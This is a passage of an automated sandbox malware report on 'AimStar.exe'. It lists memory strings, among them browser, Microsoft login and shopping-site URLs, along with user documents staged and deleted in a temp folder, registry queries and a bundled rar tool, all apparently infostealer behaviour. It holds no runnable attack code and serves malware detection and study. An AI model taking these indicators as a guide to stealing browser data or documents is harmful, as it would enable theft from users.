              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpg
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpgz
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: AimStar.exe, 00000002.00000002.2415755951.000002020E07C000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412961624.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404357827.000002020D354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: AimStar.exe, 00000002.00000003.2049843028.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048372597.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048974996.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2030161372.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048580091.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2047069115.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029008923.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2028931603.000002020C5F6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2025783196.000002020A76B000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051383625.000002020C601000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
              Source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: AimStar.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: AimStar.exe, 00000002.00000003.2164479529.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2167989840.000002020D2EB000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412312038.000002020D2EC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2214479824.000002020D2EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: AimStar.exe, 00000002.00000003.2164479529.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415391587.000002020DAD8000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2167989840.000002020D2EB000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412312038.000002020D2EC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2214479824.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137608834.000002020D2D4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: AimStar.exe, 00000002.00000003.2147551669.000002020D3B6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2147551669.000002020D3C6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2143000135.000002020D3B6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2153930314.000002020D3B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137608834.000002020D2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137509885.000002020D2EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmp, AimStar.exe, 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: AimStar.exe, 00000002.00000003.2056832978.000002020CA80000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056720050.000002020CD09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\AimStar.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GRXZDKKVDB.xlsxJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\PALRGUCVEH.pdfJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GIGIYTFFYT.mp3Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GIGIYTFFYT.mp3Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\NVWZAPQSQL.docxJump to behavior
              Source: cmd.exeProcess created: 63

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,88_2_00007FF71396D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,88_2_00007FF71399B57C
              Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP97EB.tmp
              Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP823D.tmp
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F669D40_2_00007FF710F669D4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F48BD00_2_00007FF710F48BD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F410000_2_00007FF710F41000
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F5DACC0_2_00007FF710F5DACC
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F6411C0_2_00007FF710F6411C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F609380_2_00007FF710F60938
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F581540_2_00007FF710F58154
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F519B40_2_00007FF710F519B4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F521D40_2_00007FF710F521D4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F53A140_2_00007FF710F53A14
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F65C700_2_00007FF710F65C70
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F63C800_2_00007FF710F63C80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F52C800_2_00007FF710F52C80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F664880_2_00007FF710F66488
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F609380_2_00007FF710F60938
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4A4E40_2_00007FF710F4A4E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4A34B0_2_00007FF710F4A34B
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F51BC00_2_00007FF710F51BC0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F65EEC0_2_00007FF710F65EEC
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F59F100_2_00007FF710F59F10
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4AD1D0_2_00007FF710F4AD1D
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F55DA00_2_00007FF710F55DA0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F51DC40_2_00007FF710F51DC4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F5E5E00_2_00007FF710F5E5E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F536100_2_00007FF710F53610
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F498700_2_00007FF710F49870
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F618E40_2_00007FF710F618E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F5DF600_2_00007FF710F5DF60
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F697980_2_00007FF710F69798
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F517B00_2_00007FF710F517B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F51FD00_2_00007FF710F51FD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F588040_2_00007FF710F58804
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F669D42_2_00007FF710F669D4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F410002_2_00007FF710F41000
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F5DACC2_2_00007FF710F5DACC
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F6411C2_2_00007FF710F6411C
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F609382_2_00007FF710F60938
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F581542_2_00007FF710F58154
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F519B42_2_00007FF710F519B4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F521D42_2_00007FF710F521D4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F53A142_2_00007FF710F53A14
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F65C702_2_00007FF710F65C70
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F63C802_2_00007FF710F63C80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F52C802_2_00007FF710F52C80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F664882_2_00007FF710F66488
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F609382_2_00007FF710F60938
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4A4E42_2_00007FF710F4A4E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4A34B2_2_00007FF710F4A34B
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F51BC02_2_00007FF710F51BC0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F48BD02_2_00007FF710F48BD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F65EEC2_2_00007FF710F65EEC
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F59F102_2_00007FF710F59F10
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F4AD1D2_2_00007FF710F4AD1D
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F55DA02_2_00007FF710F55DA0
